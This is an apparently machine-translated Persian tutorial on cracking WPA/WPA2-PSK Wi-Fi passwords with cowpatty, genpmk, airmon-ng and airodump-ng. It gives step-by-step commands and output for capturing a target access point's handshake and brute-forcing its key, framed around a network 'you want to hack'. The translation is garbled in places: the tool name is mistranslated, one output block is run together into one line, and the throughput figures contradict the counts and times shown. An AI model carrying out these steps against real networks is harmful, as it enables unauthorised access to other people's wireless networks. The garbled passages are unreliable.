نحوه سرعت بخشیدن به فرآیند شکستن رمز WPA/WPA2 با استفاده از Cowpatty
الزامات:
سیستم عامل لینوکس کالی
فایل دست دادن شبکه ای که می خواهید هک کنید.
فهرست لغت.
Cowpatty، توسط Joshua Wright، ابزاری است که حملات فرهنگ لغت آفلاین را برای شکستن پسوردهای WPA2-PSK خودکار می کند. Cowpatty از یک فایل هش از پیش محاسبه شده به جای یک فایل word متن ساده پشتیبانی می کند.
این می تواند فرآیند دریافت کلید WPA/WPA2 “از دست رفته” نقطه دسترسی شما را سرعت بخشد. فایلهای هش از پیش محاسبهشده برای تسریع نیروی رمز عبور هنگام شکستن WPA استفاده میشوند.
آنها این کار را با حذف نیاز به تبدیل پرهزینه رمز عبور به یک کلید رمزگذاری انجام می دهند.
کاپتی
برای دریافت خلاصه ای از گزینه ها، cowpatty را در ترمینال تایپ کنید:
گاوچران
cowpatty 4.8 – حمله فرهنگ لغت WPA-PSK. jwright@hasborg.com
Usage: cowpatty [options]
-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
کالی لینوکس یک صفحه راهنمای مختصر در اختیار شما قرار می دهد. Cowpatty به تمام موارد زیر نیاز دارد:
**فهرست کلمات.
فایلی که در آن رمز عبور هش گرفته شده است.
SSID AP هدف.
**
آداپتور بی سیم را در حالت مانیتور قرار دهید
باید آداپتور بی سیم را با تایپ کردن در حالت مانیتور قرار دهید
airmon-ng start wlan0
(با فرض اینکه نام رابط شما wlan0 باشد).
airmon-ng start wlan0
این دستور نام رابط بی سیم شما را به wlan0mon تغییر می دهد.
هدف را پیدا کنید
اسکن روترهای بی سیم اطراف را با استفاده از رابط مانیتور خود شروع کنید:
airodump-ng wlan0mon CH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net
BSSID STATION PWR Rate Lost Packets Probes
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
Capture the Handshake
Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.
airodump-ng — bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon
This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.
CH 6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][WPAhandshake:28:EF:01:35:34:85BSSIDPWRRXQBeacons#Data،#/sCHMBENCCIPHERAUTHESSID28:EF:01:35:34:85391005100025WPA25CCMPPSKSkyNetBSSIDSTATIONPWRProbesبستههایگمشده28:EF:01:35:34:8528:EF:01:23:46:68-570-101
اگر کسی به AP متصل شود، هش را میگیرم و airodump-ng به من نشان میدهد که در گوشه بالا سمت راست گرفته شده است (WPA handshake: 28:EF:01:35:34:85).
Run Cowpatty
اکنون که هش رمز عبور را دارم، میتوانم از آن با cowpatty و فهرست کلمات برای شکستن هش استفاده کنم.
cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>
تمام داده های لازم برای نصب کرک در برابر عبارت عبور WPA2/PSK جمع آوری شد.
شروع حمله به فرهنگ لغت. لطفا صبور باشید.
شماره کلید 1000: دختر فرشته
شماره کلید 2000: میسوری
شماره کلید 3000: آواز پرندگان
PSK “justletmein” است.
2000 عبارت عبور تست شده در 294.42 ثانیه: 50000.00 عبارت عبور در ثانیه
Cowpatty در حال ایجاد هش از هر کلمه در لیست کلمات با SSID به عنوان دانه است و آن را با هش ضبط شده مقایسه می کند. هنگامی که هش ها مطابقت دارند، رمز عبور AP را نمایش می دهد. این فرآیند بسیار فشرده و کند است.
Cowpatty اکنون از یک فایل هش از پیش محاسبه شده به جای یک فایل word متن ساده پشتیبانی می کند و شکستن رمز عبور WPA2-PSK را بسیار سریعتر می کند.
شما می توانید هش های خود را برای SSID هدف با استفاده از ابزاری به نام genpmk ایجاد کنید.
genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow
2641 عبارت عبور تست شده در 4.60 ثانیه: 451.00 عبارت عبور در ثانیه
هنگامی که هش را برای SSID خاص ایجاد کردید، سپس می توانید رمز عبور را با cowpatty با تایپ کردن زیر بشکنید:
cowpatty -d hash -r handshake-01.cap -s SkyNet
-d argument is for pre-calculated pmk hash name,
-r is for capture handshake file.
-s is for ESSID network name.